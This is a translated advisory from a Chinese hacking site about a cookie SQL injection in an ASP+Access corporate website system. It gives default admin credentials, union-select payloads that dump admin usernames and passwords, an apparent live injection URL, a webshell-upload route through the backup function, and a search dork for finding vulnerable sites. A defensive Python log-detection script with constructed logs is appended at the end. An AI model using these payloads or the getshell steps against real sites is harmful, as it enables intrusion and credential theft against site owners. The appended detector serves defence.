Houben figure enterprise website system cookie injection vulnerability warning - the black bar safety net

ID MYHACK58:62201131380
Type myhack58
Reporter Anonymous
Modified 2011-07-29T00:00:00


Corporate website source code based on ASP + Access. The database has anti-download protection, which is meant to make the site more secure. Modifying the site, customizing pages and styling the pages are left to you; the website source code is complete and the admin back end is powerful.

Source code download: http://www.aspjzy.com/12746.html

Admin back-end login: /admin/login.asp

Default login account: admin, password: admin888

Injection statement (preceded by a space):

and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin

Or, with 16 fields:

and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin

If that does not dump the data, guess the fields yourself.

Injection point: http://www.xueyu.org/shownews.asp?=88

Getshell: the admin back end has a backup function; upload a picture "pony" (a small webshell disguised as an image). Backup name: .asp; then access xxx.com/databakup/a.asp


inurl:shownews? asp. id=
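
A log check for the traces this advisory implies, added here as a defender's example and not part of the original advisory: it flags SQL keywords arriving in the cookie header (or the query string) and .asp files requested from the backup directory. The log lines are constructed, and it assumes IIS W3C logging with the optional cs(Cookie) field enabled; the function names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log sample (not real traffic). IIS writes spaces as '+'.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Cookie)
2011-07-29 10:00:01 192.0.2.10 GET /shownews.asp id=88 200 ASPSESSIONID=abc
2011-07-29 10:00:07 192.0.2.66 GET /shownews.asp - 200 id=88+and+1=2+union+select+1,username,password,4+from+admin
2011-07-29 10:02:30 192.0.2.66 POST /admin/login.asp - 302 ASPSESSIONID=def
2011-07-29 10:05:12 192.0.2.66 GET /databakup/a.asp - 200 -
2011-07-29 10:06:00 192.0.2.10 GET /index.asp - 200 -
"""

# "union ... select" or a boolean probe such as "and 1=2"
SQLI = re.compile(r"\bunion\b.+\bselect\b|\band\s+\d+\s*=\s*\d+", re.I)
# A script served from the backup directory named in the advisory
BACKUP_SCRIPT = re.compile(r"^/databakup/[^/]+\.asp$", re.I)

def parse(log_text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip malformed rows
                yield dict(zip(fields, values))

def detect(log_text):
    """Return (client_ip, uri, reason) for each suspicious request."""
    hits = []
    for row in parse(log_text):
        uri = row["cs-uri-stem"]
        cookie = unquote_plus(row.get("cs(Cookie)", "-"))
        query = unquote_plus(row.get("cs-uri-query", "-"))
        if SQLI.search(cookie):
            hits.append((row["c-ip"], uri, "sql-in-cookie"))
        elif SQLI.search(query):
            hits.append((row["c-ip"], uri, "sql-in-query"))
        if BACKUP_SCRIPT.match(uri):
            hits.append((row["c-ip"], uri, "script-in-backup-dir"))
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(*hit)
```

By default IIS does not log cookies, so input filters and log reviews that only look at the query string and form body will miss a payload delivered this way.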